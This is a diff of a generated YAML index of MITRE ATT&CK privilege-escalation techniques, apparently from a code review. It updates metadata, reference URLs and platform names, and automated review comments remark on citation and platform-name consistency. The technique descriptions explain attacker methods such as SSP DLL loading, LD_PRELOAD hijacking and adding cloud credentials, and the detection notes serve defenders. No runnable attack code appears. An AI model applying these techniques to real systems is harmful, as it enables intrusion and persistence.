- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17600,13 +17928,11 @@ privilege-escalation:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17683,12 +18009,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17707,6 +18032,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -17714,7 +18040,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -17734,34 +18059,36 @@ privilege-escalation:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
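Review bot: in the T1574.008 references, `Microsoft CreateProcess` and `Microsoft WinExec` are refreshed to learn.microsoft.com URLs with a September 12, 2024 retrieval date, but `Microsoft Environment Property` and `Windows NT Command Shell` are only moved and keep their `docs.microsoft.com/en-us/previous-versions//...?redirectedfrom=MSDN` links retrieved in 2016 and 2014. Refreshing all four in one pass would keep the reference block consistent; the reorder also makes this hunk read as more change than it is, since the net differences are the two URL updates, the new `revoked: false`, the spec bump from 3.1.0 to 3.2.0 and the re-added `x_mitre_modified_by_ref`.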
@@ -17797,6 +18124,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -17808,16 +18139,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -17853,12 +18180,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -17866,14 +18193,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -17888,6 +18214,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -17896,18 +18223,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -17939,9 +18266,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18013,7 +18337,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18040,7 +18363,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18066,13 +18389,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18193,12 +18514,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18230,11 +18550,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
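Review bot: the T1548 platform list replaces `Office 365`, `Google Workspace` and `Azure AD` with `Office Suite` and `Identity Provider` and bumps `x_mitre_version` to 1.4; the same substitution is applied to T1548.005, T1098.005, T1098.001 and T1098 further down. Any code that builds per-platform views of this index by matching the old platform strings will silently lose these techniques, so every such filter, and any documentation that lists the accepted platform names, needs updating in the same change.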
@@ -18275,11 +18594,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -18335,12 +18653,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18397,7 +18714,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18467,7 +18783,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18577,7 +18892,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18631,7 +18945,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18664,13 +18978,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18732,10 +19044,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -18793,7 +19104,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -18835,7 +19145,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -18894,8 +19204,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -18925,7 +19233,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
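Review bot: the unchanged citation context for T1574.005 gives a retrieval date (December 4, 2014) that predates the cited post's own date (December 8, 2015). That comes from the upstream ATT&CK data rather than from this change, so it belongs in an upstream report instead of an edit to this generated file, but the regenerated index carries it forward as-is.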
@@ -18960,12 +19268,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19042,7 +19348,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19081,7 +19386,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19130,8 +19435,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19163,7 +19466,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19211,13 +19514,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19230,16 +19531,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19251,16 +19552,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
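Review bot: for T1098.005 this hunk drops `SaaS` outright while `Azure AD` becomes `Identity Provider`. Dropping a platform is a content change rather than a rename, so please confirm it matches the upstream object at version 1.3 and that a `SaaS`-keyed view of this index is expected to lose Device Registration.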
@@ -19315,7 +19616,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19338,7 +19638,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19382,8 +19682,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19460,7 +19758,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19488,8 +19786,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19548,23 +19844,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -19574,11 +19869,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
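Review bot: the new `CreateLoginProfile` sentence introduces two citation keys, `Permiso Scattered Spider 2023` and `Lacework AI Resource Hijacking 2024`, which only resolve if `external_references` entries with the same `source_name` exist; the later hunks in this file do add them, so the description and reference hunks must land in the same commit. Also worth noting that the object's `x_mitre_detection` text below still covers only Service Principal modifications and SSH key APIs, so creating a console password for an existing IAM user is now described in the technique but not in its detection guidance; that gap is upstream, not something to patch in this generated file.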
@@ -19589,12 +19888,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -19603,6 +19909,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19611,13 +19918,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
